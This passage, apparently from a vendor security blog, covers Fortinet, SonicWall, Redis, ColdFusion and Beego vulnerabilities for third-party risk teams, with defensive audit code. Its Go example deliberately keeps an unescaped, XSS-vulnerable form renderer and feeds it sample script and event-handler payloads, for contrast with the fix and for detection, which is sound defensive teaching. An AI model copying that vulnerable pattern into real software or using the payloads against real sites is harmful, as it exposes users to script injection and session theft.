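The "inspect for unauthorized symbolic links" step above can be automated wherever the served directory can be mounted or copied off the appliance. The Python scan below is an added example, not Fortinet code and not something that runs on FortiOS itself: it walks a web-served tree without following links and reports every symlink whose resolved target lies outside the served root, which is exactly the shape of the persistence described in this post. The folder and file names (`lang/`, `en.json`, `pl.json`) and the temporary directory are constructed for the demonstration.

```python
"""Flag symbolic links in a web-served directory that escape that directory.

Added example, not Fortinet code. The backdoor described above persists by
placing links in a public language-file folder that point into the root
file system; a link whose real target is outside the served root is the
indicator this scan looks for. Directory layout is constructed.
"""
import os
import tempfile
from typing import List, Tuple


def find_escaping_symlinks(served_root: str) -> List[Tuple[str, str]]:
    """Return (link_path, real_target) for every symlink under served_root
    whose fully resolved target is not inside served_root.

    os.walk is run with followlinks=False so a link to '/' is listed but
    never descended into; dangling links are still reported, since
    realpath resolves them without requiring the target to exist."""
    root_real = os.path.realpath(served_root)
    findings: List[Tuple[str, str]] = []
    for dirpath, dirnames, filenames in os.walk(served_root, followlinks=False):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            if not os.path.islink(path):
                continue
            target = os.path.realpath(path)
            # A target inside the root shares the root as its common prefix.
            if os.path.commonpath([root_real, target]) != root_real:
                findings.append((path, target))
    return sorted(findings)


def build_demo_tree() -> str:
    """Create a constructed 'lang' folder containing one genuine file, one
    harmless link that stays inside the root, and one link to '/' that
    escapes it. Returns the served root path."""
    base = tempfile.mkdtemp(prefix="symlink-audit-")
    lang = os.path.join(base, "lang")
    os.makedirs(lang)
    with open(os.path.join(lang, "en.json"), "w", encoding="utf-8") as fh:
        fh.write("{}")
    # Benign: alias within the served tree.
    os.symlink(os.path.join(lang, "en.json"), os.path.join(lang, "default.json"))
    # Escaping: exposes the whole file system through the public folder.
    os.symlink("/", os.path.join(lang, "pl.json"))
    return base
```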

How Can TPRM Professionals Leverage Black Kite for This Vulnerability?

Black Kite provides a FocusTag for the Fortinet Symlink Backdoor, enabling organizations to identify vendors potentially affected by this issue. The FocusTag includes detailed information about the associated vulnerabilities, affected assets, and remediation guidance. By utilizing this FocusTag, TPRM professionals can prioritize their risk assessments, focusing on vendors with known exposures, and facilitate targeted remediation efforts.​

Black Kite’s Fortinet Symlink Backdoor FocusTag™ details critical insights on the event for TPRM professionals.

CVE-2025-32818 in SonicWall SSLVPN Gen 7

What is the SonicWall SSLVPN DoS Vulnerability?

CVE-2025-32818 is a high-severity vulnerability impacting the SonicWall SonicOS SSLVPN Virtual Office interface, identified as a Null Pointer Dereference issue. This flaw allows unauthenticated remote attackers to crash the firewall, leading to a Denial-of-Service (DoS) condition. The vulnerability affects Gen7 firewall models and NSv platforms running firmware versions 7.1.1-7040 through 7.1.3-7015, and TZ80 models on version 8.0.0-8037 or earlier.

Disclosed publicly on April 23, 2025, by SonicWall PSIRT (Advisory ID: SNWLID-2025-0009), the vulnerability has a CVSS v3 score of 7.5 and an EPSS score of 0.04%. It is exploitable only if the SSLVPN service is enabled. While proof-of-concept exploit code is not yet publicly available, and the issue is not included in CISA’s Known Exploited Vulnerabilities catalog, proactive mitigation is strongly encouraged. Given the firewall’s critical role in securing remote access, any disruption to its availability can impact business continuity.

Why Should TPRM Professionals Be Concerned About This Vulnerability?

SonicWall Gen7 devices are widely deployed by vendors for secure remote access. These devices protect sensitive traffic through their SSLVPN services, and a crash of such a firewall can mean sudden loss of remote connectivity, disruption of business-critical workflows, and exposure to further compromise during downtime. Even though this vulnerability does not allow code execution or data exfiltration directly, it can be weaponized for targeted service disruption—especially in organizations that rely on 24/7 availability.

From a third-party risk perspective, a vendor with vulnerable or improperly configured SonicWall devices may lose access to essential services or fail to meet service-level agreements (SLAs). If exploited during an incident, the firewall’s unavailability can also delay incident response or containment activities.

What questions should TPRM professionals ask vendors about CVE-2025-32818?

To better understand vendor exposure and readiness, consider asking:

  1. Have you updated your Gen7 NSv & Firewalls to SonicOS 7.2.0-7015 or later, and TZ80 to 8.0.1-8017 or later to mitigate the risk of CVE-2025-32818?
  2. Can you confirm if the SSLVPN service on your SonicWall devices has been disabled to prevent the exploitation of the Null Pointer Dereference issue in the SonicOS SSLVPN Virtual Office interface?
  3. Have you observed any unexpected reboots or service interruptions in your Gen7 NSv (NSv 270, NSv 470, NSv 870), Gen7 Firewalls (TZ270, TZ270W, TZ370, TZ370W, TZ470, TZ470W, TZ570, TZ570W, TZ570P, TZ670, NSa 2700, NSa 3700, NSa 4700, NSa 5700, NSa 6700, NSsp 10700, NSsp 11700, NSsp 13700, NSsp 15700: Firmware 7.1.1-7040 through 7.1.3-7015 (7.1.x)) and TZ80: 8.0.0-8037 and earlier, which could indicate a Denial-of-Service attack due to CVE-2025-32818?
  4. Have you implemented strict access controls on all management interfaces and disabled unused services on your SonicWall devices as a part of hardening measures against potential exploitation of CVE-2025-32818?

Remediation Recommendations for Vendors Subject to This Risk

Vendors using SonicWall SSLVPN Gen7 appliances should take the following remediation steps:

  • Apply Firmware Updates: Upgrade all affected Gen7 Firewalls and NSv platforms to version 7.2.0-7015 or higher, and TZ80 devices to 8.0.1-8017 or higher.
  • Temporarily Disable SSLVPN: If patching cannot be performed immediately, disable the SSLVPN service to prevent exploitation.
  • Audit System Logs: Review logs for signs of service crashes or abnormal behavior linked to SSLVPN usage.
  • Restrict Access: Limit external access to the SSLVPN interface through IP whitelisting and network segmentation.
  • Review Configuration: Ensure unnecessary services, especially public-facing features like Virtual Office, are disabled when not in use.

How TPRM Professionals Can Leverage Black Kite for This Vulnerability

Black Kite published the SonicWall SSLVPN Gen7 FocusTag on April 25, 2025, enabling TPRM teams to pinpoint vendors potentially exposed to CVE-2025-32818. This tag provides asset-level visibility, including IP addresses and service banners that indicate the presence of vulnerable configurations.

By using this FocusTag, risk managers can prioritize outreach to vendors actively running impacted SonicWall models and validate whether they’ve implemented mitigation steps. If a vendor has SonicWall SSLVPN publicly exposed, the tag surfaces this directly, significantly reducing the scope of your due diligence efforts.

This tag is especially useful for organizations relying on multiple vendors that use SonicWall for remote access, helping you rapidly assess operational impact and contain downstream availability risks before they escalate.

Black Kite’s SonicWall SSLVPN Gen7 FocusTag™ details critical insights on the event for TPRM professionals.

CVE-2025-21605 in Redis Server

What is the Redis Server DoS Vulnerability?

CVE-2025-21605 is a high-severity Denial-of-Service (DoS) vulnerability impacting Redis servers. The flaw arises due to unlimited growth of output buffers, caused by an unauthenticated client sending commands or triggering repeated “NOAUTH” responses when password authentication is enabled. If exploited, the Redis server’s memory can be completely exhausted, causing the service to crash. This vulnerability carries a CVSS v3 score of 7.5 and an EPSS score of 0.04%.

First publicly disclosed on April 23, 2025, via GitHub Security Advisories (GHSA-r67f-p999-2gff), the issue affects Redis versions from 2.6 up to but not including 7.4.3. Although no proof-of-concept exploit code is publicly available at this time, Redis’s widespread deployment in production environments elevates the concern. As of today, CVE-2025-21605 has not been added to CISA’s Known Exploited Vulnerabilities catalog, and no advisory has been released by CISA.

Redis maintainers have addressed this vulnerability in Redis 7.4.3, where sensible client output buffer limits have been introduced.

Why Should TPRM Professionals Be Concerned About This Vulnerability?

Redis servers are commonly used to cache critical application data, manage sessions, and handle real-time information. A service crash triggered by an unauthenticated client could lead to serious disruption in vendor environments, including website outages, application failures, and business process interruptions.

From a TPRM perspective, any vendor relying on exposed or improperly secured Redis instances is at risk of operational downtime without advance warning. In environments where Redis clusters are part of larger SaaS offerings or critical backend systems, a DoS incident could cascade across dependent systems, impacting availability and client trust. Given that Redis by default does not restrict output buffer growth for normal clients, vendors who have not proactively hardened their Redis configurations may be vulnerable.

What questions should TPRM professionals ask vendors about CVE-2025-21605?

To assess third-party exposure related to this Redis vulnerability, consider asking:

  1. Have you updated all instances of Redis Server to version 7.4.3 or later to mitigate the risk of CVE-2025-21605?
  2. Have you configured the client-output-buffer-limit normal <hard-limit> in redis.conf to throttle untrusted clients and prevent unlimited output buffer growth?
  3. Have you enforced TLS and required client-side certificates to ensure only authenticated clients can connect to your Redis servers?
  4. Have you implemented network access controls such as firewalls, iptables, or security groups to restrict unauthenticated access to your Redis servers?

Remediation Recommendations for Vendors Subject to This Risk

Vendors should adopt the following mitigation and remediation strategies:

  • Upgrade Redis: Update Redis servers to version 7.4.3 or later, where built-in safeguards against buffer exhaustion are implemented.
  • Apply Manual Controls: Set a strict client-output-buffer-limit for normal clients in the redis.conf configuration file.
  • Restrict Access: Use firewalls, iptables, or security groups to limit access to Redis servers only to trusted networks or authenticated clients.
  • Enforce Secure Communication: Enable TLS encryption and require client-side certificates to authenticate users connecting to the Redis server.
  • Monitor Resource Utilization: Continuously monitor memory usage patterns and set up alerts for unusual output buffer growth.
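The version, configuration and monitoring checks in the questions and recommendations above can be run against evidence a vendor already holds. The Python helpers below are an added example, not Redis project code: they parse a redis-server version string, a redis.conf excerpt and the text output of CLIENT LIST, and flag a version in the affected range (2.6 up to but not including 7.4.3), a missing hard limit for the normal client class, and connected clients whose output-buffer memory (the omem field) exceeds a threshold. All sample inputs, addresses and the 64 MB threshold are constructed.

```python
"""Audit helpers for the Redis output-buffer DoS (CVE-2025-21605).

Added example, not Redis project code. Inputs are the kind of text a
defender already has: a redis-server version banner, redis.conf, and the
output of CLIENT LIST. All sample values below are constructed.
"""
import re
from typing import Dict, List, Tuple

FIRST_AFFECTED = (2, 6, 0)
FIXED_VERSION = (7, 4, 3)          # fixed release named in the post

# redis.conf memory units: bare k/m/g are powers of 1000, kb/mb/gb of 1024.
_UNITS = {"": 1, "k": 1000, "kb": 1024, "m": 1000**2, "mb": 1024**2,
          "g": 1000**3, "gb": 1024**3}

# Constructed samples.
SAMPLE_VERSION = "Redis server v=7.4.2 sha=00000000:0 malloc=jemalloc-5.3.0 bits=64"
SAMPLE_CONF_WEAK = """# constructed redis.conf excerpt: only the replica/pubsub defaults
client-output-buffer-limit replica 256mb 64mb 60
client-output-buffer-limit pubsub 32mb 8mb 60
requirepass changeme
"""
SAMPLE_CONF_HARDENED = SAMPLE_CONF_WEAK + "client-output-buffer-limit normal 64mb 16mb 60\n"
SAMPLE_CLIENT_LIST = (
    "id=3 addr=10.0.0.5:52555 laddr=10.0.0.1:6379 fd=8 name= age=855 idle=0 flags=N "
    "db=0 sub=0 psub=0 ssub=0 multi=-1 qbuf=26 qbuf-free=20448 argv-mem=10 multi-mem=0 "
    "rbs=1024 rbp=0 obl=0 oll=0 omem=0 tot-mem=22298 events=r cmd=get user=app redir=-1 resp=2\n"
    "id=9 addr=203.0.113.77:41000 laddr=10.0.0.1:6379 fd=12 name= age=120 idle=0 flags=N "
    "db=0 sub=0 psub=0 ssub=0 multi=-1 qbuf=0 qbuf-free=0 argv-mem=0 multi-mem=0 "
    "rbs=1024 rbp=0 obl=0 oll=48211 omem=789413888 tot-mem=789415000 events=rw cmd=NULL "
    "user=default redir=-1 resp=2\n"
)


def parse_version(text: str) -> Tuple[int, int, int]:
    """Extract major.minor.patch from 'redis_version:7.2.4' or a server banner."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"no version found in {text!r}")
    major, minor, patch = (int(x) for x in m.groups())
    return major, minor, patch


def is_affected(version: Tuple[int, int, int]) -> bool:
    """Affected range per the advisory: 2.6 up to, but not including, 7.4.3."""
    return FIRST_AFFECTED <= version < FIXED_VERSION


def parse_memory(value: str) -> int:
    """Convert a redis.conf size such as '64mb' or '1g' to bytes."""
    m = re.fullmatch(r"(\d+)([kmg]b?)?", value.lower())
    if not m:
        raise ValueError(f"bad memory value {value!r}")
    return int(m.group(1)) * _UNITS[m.group(2) or ""]


def normal_client_hard_limit(conf_text: str) -> int:
    """Hard limit (bytes) set for the 'normal' client class; 0 when unset,
    which is the Redis default and the condition this CVE relies on."""
    limit = 0
    for line in conf_text.splitlines():
        parts = line.split("#", 1)[0].split()          # strip comments
        if (len(parts) >= 3 and parts[0] == "client-output-buffer-limit"
                and parts[1] == "normal"):
            limit = parse_memory(parts[2])             # last directive wins
    return limit


def parse_client_list(output: str) -> List[Dict[str, str]]:
    """Turn CLIENT LIST text (one client per line, key=value tokens) into dicts."""
    clients = []
    for line in output.strip().splitlines():
        fields = dict(tok.split("=", 1) for tok in line.split(" ") if "=" in tok)
        if fields:
            clients.append(fields)
    return clients


def clients_over_limit(output: str, omem_threshold: int) -> List[Tuple[str, int]]:
    """(addr, omem) for clients whose output buffer exceeds the threshold,
    largest first. Sustained growth here is the symptom to alert on."""
    hits = []
    for c in parse_client_list(output):
        omem = int(c.get("omem", "0"))
        if omem > omem_threshold:
            hits.append((c.get("addr", "?"), omem))
    return sorted(hits, key=lambda t: -t[1])


def audit(version_text: str, conf_text: str, client_list: str,
          omem_threshold: int = 64 * 1024 * 1024) -> Dict[str, object]:
    """Combine the three checks into one report."""
    version = parse_version(version_text)
    return {"version": version,
            "version_affected": is_affected(version),
            "normal_hard_limit": normal_client_hard_limit(conf_text),
            "suspicious_clients": clients_over_limit(client_list, omem_threshold)}
```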

How TPRM Professionals Can Leverage Black Kite for This Vulnerability

Black Kite released the Redis Server FocusTag on April 23, 2025, allowing organizations to quickly identify vendors potentially exposed to CVE-2025-21605. By using this FocusTag, TPRM teams can pinpoint companies operating vulnerable Redis versions or improperly configured instances that may be susceptible to DoS attacks.

The FocusTag enriches risk assessments by providing asset-level intelligence such as IP addresses and relevant service information. With this insight, TPRM professionals can prioritize outreach and remediation requests, ensuring that critical third-party partners address the vulnerability before it leads to business disruption.

In environments where Redis plays a pivotal backend role, using Black Kite’s FocusTags™ ensures that availability risks are proactively managed, rather than discovered during an unexpected service failure.

Black Kite’s Redis Server FocusTag™ details critical insights on the event for TPRM professionals.

Enabling Proactive TPRM With Black Kite’s FocusTags™

The vulnerabilities explored in this week’s Focus Friday—ranging from backdoor persistence via patched Fortinet SSL-VPN flaws, to denial-of-service conditions in SonicWall appliances and Redis servers—highlight the diverse and evolving nature of third-party cybersecurity risk. In environments where availability, remote access security, and in-memory data handling are mission-critical, even a single overlooked CVE can introduce severe operational and reputational damage.

Black Kite’s FocusTags™ empower TPRM teams to tackle this complexity head-on with:

  • Asset-Specific Vulnerability Detection: Identify which vendors are operating affected systems based on real asset intelligence, including IP addresses and exposed services.
  • Risk Triage at Scale: Quickly narrow down vendor lists by severity, exposure type, and system criticality—enabling faster decisions and response planning.
  • Vendor-Specific Inquiry Support: Use detailed FocusTag insights to pose informed, vulnerability-specific questions during vendor outreach.
  • Improved Incident Preparedness: Continuously monitor your third-party landscape as new vulnerabilities emerge, ensuring that no critical issue is missed.

With threats targeting everything from network edge devices to internal caching systems, Black Kite’s FocusTags™ offer a powerful lens to see where exposure lies, how to address it, and how to prioritize what matters most—before incidents escalate.








FocusTags™ in the Last 30 Days:

  • Fortinet Symlink Backdoor : CVE-2022-42475, CVE-2024-21762, CVE-2023-27997, Arbitrary Code Execution Vulnerability, Numeric Truncation Error, Heap-based Buffer Overflow Vulnerability, Out-of-bounds Write Vulnerability in FortiGate devices.
  • SonicWall SSLVPN Gen7 : CVE-2025-32818, Null Pointer Dereference Vulnerability, DoS Vulnerability in SonicWall SSLVPN Gen 7 devices.
  • Redis Server : CVE-2025-21605, Allocation of Resources Without Limits or Throttling in Redis Servers.
  • Adobe ColdFusion : CVE-2025-24446, CVE-2025-24447, CVE-2025-30281, CVE-2025-30282, CVE-2025-30284, CVE-2025-30285, CVE-2025-30286, CVE-2025-30287, CVE-2025-30288, CVE-2025-30289, CVE-2025-30290, Deserialization of Untrusted Data, Improper Authentication, Improper Access Control, OS Command Injection, Improper Input Validation, Path Traversal Vulnerabilities in Adobe ColdFusion.
  • Beego: CVE-2025-30223, Reflected/Stored XSS Vulnerabilities in Beego Web Framework.
  • Ivanti Connect Secure : CVE‑2025‑22457, Stack‑based Buffer Overflow Vulnerability in Ivanti Connect Secure, Ivanti Policy Secure, and Ivanti ZTA Gateways.
  • FortiSwitch : CVE‑2024‑48887, Unverified Password Change Vulnerability in Fortinet FortiSwitch web interface.
  • MinIO : CVE‑2025‑31489, Improper Verification of Cryptographic Signature Vulnerability in MinIO Go module package.
  • Kubernetes Ingress NGINX : CVE-2025-1097, CVE-2025-1098, CVE-2025-24514, CVE-2025-1974, Improper Isolation or Compartmentalization Vulnerability, Remote Code Execution Vulnerability in Kubernetes ingress-nginx controller.
  • Synology DSM : CVE-2024-10441, Remote Code Execution Vulnerability in Synology BeeStation OS (BSM), Synology DiskStation Manager (DSM).
  • Synapse Server : CVE-2025-30355, Improper Input Validation Vulnerability in Matrix Synapse Server.
  • Juniper Junos OS – Mar2025 : CVE-2025-21590, Improper Isolation or Compartmentalization Vulnerability in Juniper Junos OS.
  • SAP NetWeaver – Mar2025 : CVE-2017-12637, Directory Traversal Vulnerability in SAP NetWeaver Application Server.
  • MongoDB – Mar2025 : CVE-2025-0755, Heap-based Buffer Overflow Vulnerability in MongoDB’s C driver library (libbson).
  • DrayTek Vigor – Mar2025 : CVE-2024-41334, CVE-2024-41335, CVE-2024-41336, CVE-2024-41338, CVE-2024-41339, CVE-2024-41340, CVE-2024-51138, CVE-2024-51139, Code Injection Vulnerability, Arbitrary Code Execution Vulnerability, Observable Discrepancy, Sensitive Information Disclosure, Plaintext Storage of a Password, NULL Pointer Dereference, DoS Vulnerability, Unrestricted Upload of File with Dangerous Type, Stack-based Buffer Overflow Vulnerability, Buffer Overflow Vulnerability, Cross-Site Request Forgery (CSRF) Vulnerability in DrayTek Vigor Routers.

References

https://nvd.nist.gov/vuln/detail/CVE-2024-21762

https://nvd.nist.gov/vuln/detail/CVE-2023-27997

https://nvd.nist.gov/vuln/detail/cve-2022-42475

https://cybersecuritynews.com/hackers-actively-exploits-patched-fortinet-fortigate-devices

https://www.bleepingcomputer.com/news/security/over-16-000-fortinet-devices-compromised-with-symlink-backdoor/

https://www.fortiguard.com/psirt/FG-IR-22-398

https://nvd.nist.gov/vuln/detail/CVE-2025-32818

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0009

https://securityonline.info/high-severity-sonicwall-sslvpn-vulnerability-allows-firewall-crashing

https://nvd.nist.gov/vuln/detail/CVE-2025-21605

https://github.com/redis/redis/security/advisories/GHSA-r67f-p999-2gff


How to Prioritize Vulnerabilities in Your Supply Chain: A Proven Approach to Cut Through the Noise

23 April 2025 at 11:51

Written by: Ferhat Dikbiyik, Chief Research & Intelligence Officer

Drowning in vulnerability alerts? You’re not alone. Cybersecurity professionals dealing with Third-Party Risk Management (TPRM) are facing an overwhelming flood of Common Vulnerabilities and Exposures (CVEs), making it nearly impossible to address every single threat. Traditional methods of vulnerability management, often relying solely on severity scores, simply aren’t cutting it in today’s complex supply chain environment. How do you decide which vulnerabilities to tackle first when you have thousands clamoring for attention?

Fortunately, there’s a better way.

In this video, I walk through the findings of our 2025 Supply Chain Vulnerability Report, featuring original research by the Black Kite Research & Intelligence Team (BRITE), breaking down the key challenges of vulnerability prioritization and introducing a powerful three-dimensional approach that helps TPRM professionals effectively prioritize vulnerabilities in their supply chain. This method allows you to focus on what truly matters and dramatically reduce risk.

View this video on YouTube.

Three Dimensions for Prioritizing CVEs in TPRM:

1. Severity

This is the traditional approach, using metrics like CVSS to assess the potential impact of a vulnerability. While important, the report emphasizes that severity alone is insufficient.

2. Exploitability

This dimension considers the likelihood of a vulnerability being actively exploited by threat actors. Factors like the availability of exploit code and threat actor trends come into play.

3. Exposure

This crucial element addresses how many of your vendors or third parties are susceptible to a specific vulnerability. A high-severity, easily exploitable vulnerability affecting a large number of your vendors poses a significantly greater risk.

Result: Hear the Signal in the Noise

By combining these three dimensions, security teams can move beyond simply reacting to the loudest alerts and develop a truly strategic approach to vulnerability management. The video provides clear explanations and visual aids to help you grasp these concepts and begin implementing them in your own organization.

Dive deeper and gain a comprehensive understanding of supply chain vulnerability management. Read the full 2025 Supply Chain Vulnerability Report for detailed analysis, actionable recommendations, and best practices.

And be sure to watch Part 2 of my video walkthrough of the report to discover how Black Kite solves the problem of managing vulnerability risks in the supply chain with FocusTags™ vulnerability intelligence.



Read our full 2025 Supply Chain Vulnerability Report: Navigating a New Era of Managing Vulnerability Risk in Third Parties – accessible instantly, no download required.





FOCUS FRIDAY: THIRD-PARTY RISKS FROM ADOBE COLDFUSION AND BEEGO XSS VULNERABILITIES

18 April 2025 at 08:12

Written by: Ferdi Gül

Welcome to this week’s Focus Friday, where we examine high‑profile vulnerabilities through a Third‑Party Risk Management (TPRM) lens. As cyber threats continue to evolve in scope and complexity, TPRM teams are increasingly challenged to respond to emerging vulnerabilities with speed and precision. This week we examine two critical security issues: one affecting Adobe ColdFusion and the other targeting the Beego framework for Go. Both expose organizations to serious risks, including remote code execution (RCE), access control bypass, and session hijacking.

We break down each incident from a TPRM perspective, highlighting the specific technical risks, vendor remediation recommendations, and key questions TPRM professionals should ask. Additionally, we demonstrate how Black Kite’s FocusTags™ help organizations identify affected vendors quickly and take meaningful action without wasting time on broad-based questionnaires or assumptions.

Filtered view of companies with Adobe ColdFusion FocusTag™ on the Black Kite platform.

Critical Adobe ColdFusion Vulnerabilities

What are the Critical Vulnerabilities Recently Discovered in Adobe ColdFusion?

A large set of critical vulnerabilities was recently identified in Adobe ColdFusion, affecting versions 2021, 2023, and 2025. These flaws, including CVE-2025-24446, CVE-2025-24447, CVE-2025-30281 through CVE-2025-30290, span multiple attack categories such as arbitrary file system read, remote code execution (RCE), OS command injection, access control bypass, and improper authentication. The CVSS scores for these vulnerabilities range from 7.5 to 9.8, and their EPSS scores indicate active risk, with some as high as 1.44%.

These vulnerabilities stem from insecure deserialization, improper input validation, access control weaknesses, and failure to sanitize user-supplied input.

Adobe ColdFusion Critical Vulnerabilities Details Table

While no exploitation has been observed in the wild yet, and these CVEs are not currently listed in CISA’s Known Exploited Vulnerabilities (KEV) catalog, the public disclosure on April 8, 2025, along with multiple critical CVSS scores and high EPSS predictions, raises serious concerns.

Why Should TPRM Professionals Care About These Vulnerabilities?

TPRM professionals must be particularly cautious when it comes to ColdFusion deployments, as these vulnerabilities directly impact critical business applications hosted on ColdFusion platforms. Exploitation could lead to unauthorized file access, arbitrary code execution, or full system compromise—potentially exposing sensitive client data or internal business logic.

Adobe ColdFusion is frequently used in enterprise and government environments. The presence of deserialization vulnerabilities and OS-level command injection significantly increases the risk of lateral movement, persistent access, and data exfiltration within third-party ecosystems. Additionally, since these issues affect all ColdFusion versions prior to the latest updates, unpatched systems are common in unmanaged or aging vendor environments.

What Questions Should TPRM Professionals Ask Vendors About These Vulnerabilities?

To assess vendor exposure, TPRM professionals should consider asking:

  1. Have you updated all instances of Adobe ColdFusion to the latest versions (ColdFusion 2021 Update 19, ColdFusion 2023 Update 13, ColdFusion 2025 Update 1) to mitigate the risk of the mentioned CVEs?
  2. Can you confirm if you have implemented the recommended actions such as auditing access controls and logs, reviewing file upload and deserialization controls, and limiting application exposure to mitigate the risk of these vulnerabilities?
  3. Have you applied the security configuration settings included in the ColdFusion Security documentation and reviewed the respective Lockdown guides as recommended by Adobe?
  4. Have you updated your ColdFusion JDK/JRE LTS version to the latest update release and set the recommended JVM flags on a JEE installation of ColdFusion as a secure practice?

Remediation Recommendations for Vendors Subject to This Risk

Vendors using ColdFusion should take the following technical steps to address these vulnerabilities:

  • Patch Immediately: Upgrade ColdFusion to the latest versions—2025 Update 1, 2023 Update 13, or 2021 Update 19.
  • Secure Deserialization and Upload Paths: Review all serialization-related functions and restrict unsafe classes using Adobe’s serial filter documentation.
  • Apply JVM Flags for JEE Installations: Set -Djdk.serialFilter values as recommended by Adobe to block dangerous object types during deserialization.
  • Isolate ColdFusion Services: Place ColdFusion services behind firewalls or WAFs and restrict access to only required IP ranges.
  • Audit Access Logs: Review logs for unauthorized access attempts or security feature misuse, especially around the setAdminPassword, upload handlers, or URL routing logic.
  • Follow Adobe’s Lockdown Guide: Apply recommended security configurations from Adobe’s official lockdown and JVM guidance for your ColdFusion version.

How TPRM Professionals Can Leverage Black Kite for This Vulnerability

Black Kite published the Adobe ColdFusion FocusTag™ on April 11, 2025, to help organizations identify at-risk vendors rapidly. Using internet-wide scanning, subdomain fingerprinting, and exposed asset detection, Black Kite identifies vendors that host ColdFusion installations vulnerable to the disclosed CVEs.

TPRM teams can use this FocusTag™ to immediately narrow down the list of potentially impacted vendors, enabling fast risk prioritization, informed questioning, and effective outreach. By providing visibility into external-facing infrastructure and the likelihood of exposure, Black Kite simplifies complex supply chain risk monitoring in real time.

Black Kite’s Adobe ColdFusion FocusTag™ details critical insights on the event for TPRM professionals.

CVE-2025-30223: Beego RenderForm() XSS Vulnerability

What is the Critical XSS Vulnerability in the Beego Framework?

CVE-2025-30223 is a critical Cross-Site Scripting (XSS) vulnerability discovered in the Beego web framework for Go, affecting all versions up to and including v2.3.5. The issue resides in the RenderForm() function, which dynamically generates HTML form fields. This function improperly handles user-supplied input and outputs it as raw HTML using template.HTML, bypassing Go’s built-in HTML escaping mechanisms.

The underlying problem originates from a helper function, renderFormField(), which uses fmt.Sprintf() to construct form input fields with values such as label, name, and value directly injected into the HTML structure. Since no HTML escaping is applied to these values, attackers can inject JavaScript payloads into form fields. This makes it possible to exploit the vulnerability through:

  • Attribute Injection, such as injecting an event handler into the DisplayName field (onmouseover="alert('XSS')"),
  • Content Injection, such as inserting <script> tags into a textarea field.

With a CVSS score of 9.3, the vulnerability poses significant risk, especially in applications where user-generated content is displayed to others. Although this CVE is not listed in CISA’s KEV catalog as of now, a public proof-of-concept (PoC) was made available in early April 2025, demonstrating how JavaScript payloads can be rendered and executed in real-world browser sessions.

Why Should TPRM Professionals Care About This Vulnerability?

Beego is a widely adopted Go framework, popular among SaaS and platform providers due to its performance and simplicity. Applications that use RenderForm() with user-controlled inputs are highly susceptible to exploitation. This vulnerability is especially problematic for TPRM because:

  • It allows client-side code execution in users’ browsers.
  • It enables session hijacking, credential theft, and fake form injection.
  • It can compromise administrative interfaces, resulting in account takeover of privileged users.

Vendors using Beego without proper patching or escaping mechanisms expose their customers to client-side threats that are difficult to detect from the backend. Moreover, XSS vulnerabilities often serve as an entry point for further attacks, including credential stuffing, business logic abuse, or malware injection.

What Questions Should TPRM Professionals Ask Vendors About This Vulnerability?

To assess the exposure of vendors using the Beego framework, consider asking the following:

  1. Have you upgraded all instances of Beego Framework to version v2.3.6 or later to mitigate the risk of CVE-2025-30223?
  2. Can you confirm if you have reviewed all components using the RenderForm() function in your Beego application and ensured that no untrusted data is passed directly without escaping?
  3. Have you implemented a strong Content Security Policy (CSP) to restrict which scripts can be executed in the browser, as a measure to prevent the execution of malicious JavaScript injected via XSS?
  4. Have you audited stored data that might have been injected with XSS payloads before patching, especially in user-generated fields like DisplayName or Bio, to ensure no malicious scripts are present?

Remediation Recommendations for Vendors Subject to This Risk

Organizations using vulnerable Beego versions should take immediate actions:

  • Upgrade Beego to v2.3.6 or later, which properly escapes all HTML input using template.HTMLEscapeString() inside RenderForm() and its helper methods.
  • Sanitize All Inputs: Audit application code to ensure no unescaped user data is being passed to the UI layer.
  • Implement CSP: Use Content Security Policy headers to prevent the execution of inline or unauthorized scripts.
  • Review Cookies: Set HttpOnly and Secure flags on cookies to prevent session theft through JavaScript.
  • Scan and Monitor: Use automated security scanners to detect residual or future XSS vulnerabilities and monitor for unusual activity within administrative dashboards.
  • Audit Stored Data: Check stored fields like DisplayName and Bio for embedded scripts that may persist across sessions.
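The unescaped rendering pattern described in the Beego section above, beside the HTMLEscapeString-based fix the upgrade note refers to, as an added example written for this post in Go. It is not Beego’s own code: formField, renderFieldUnsafe, renderFieldSafe and hasUnescapedPayload are constructed names, and the sample inputs are modelled on the two injection classes the advisory names.

```go
package main

import (
	"fmt"
	"html/template"
	"regexp"
)

// formField holds the user-controlled values that a RenderForm-style helper
// interpolates into markup (constructed type, not Beego's own).
type formField struct {
	Label string
	Name  string
	Type  string // "text" or "textarea"
	Value string
}

// renderFieldUnsafe reproduces the vulnerable pattern: fmt.Sprintf pastes the
// values straight into the markup and template.HTML marks the result as
// trusted, so html/template performs no escaping when the page is rendered.
func renderFieldUnsafe(f formField) template.HTML {
	if f.Type == "textarea" {
		return template.HTML(fmt.Sprintf(`<label>%s</label><textarea name="%s">%s</textarea>`,
			f.Label, f.Name, f.Value))
	}
	return template.HTML(fmt.Sprintf(`<label>%s</label><input type="%s" name="%s" value="%s">`,
		f.Label, f.Type, f.Name, f.Value))
}

// renderFieldSafe escapes every interpolated value with
// template.HTMLEscapeString before the string is marked as HTML, which is the
// remediation the advisory describes for v2.3.6 and later.
func renderFieldSafe(f formField) template.HTML {
	esc := template.HTMLEscapeString
	if f.Type == "textarea" {
		return template.HTML(fmt.Sprintf(`<label>%s</label><textarea name="%s">%s</textarea>`,
			esc(f.Label), esc(f.Name), esc(f.Value)))
	}
	return template.HTML(fmt.Sprintf(`<label>%s</label><input type="%s" name="%s" value="%s">`,
		esc(f.Label), esc(f.Type), esc(f.Name), esc(f.Value)))
}

// activePayload matches a closed attribute followed by an inline event handler
// (attribute injection) or an opening <script> tag (content injection).
var activePayload = regexp.MustCompile(`(?i)"\s+on\w+\s*=|<script\b`)

// hasUnescapedPayload is a coarse audit check for rendered fragments or for
// stored field values such as DisplayName or Bio: true means the markup still
// carries an executable payload and needs escaping or cleanup.
func hasUnescapedPayload(h template.HTML) bool {
	return activePayload.MatchString(string(h))
}

func main() {
	// Constructed inputs modelled on the two injection classes in the advisory.
	fields := []formField{
		{Label: "Display name", Name: "DisplayName", Type: "text", Value: `" onmouseover="alert('XSS')"`},
		{Label: "Bio", Name: "Bio", Type: "textarea", Value: "<script>alert('XSS')</script>"},
	}
	for _, f := range fields {
		u, s := renderFieldUnsafe(f), renderFieldSafe(f)
		fmt.Printf("unsafe: %s\n        payload present: %v\n", u, hasUnescapedPayload(u))
		fmt.Printf("safe:   %s\n        payload present: %v\n", s, hasUnescapedPayload(s))
	}
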